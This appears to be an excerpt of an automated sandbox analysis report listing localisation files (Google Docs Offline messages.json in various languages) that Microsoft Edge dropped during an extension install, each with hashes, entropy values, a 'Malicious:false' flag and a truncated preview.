                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2766
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
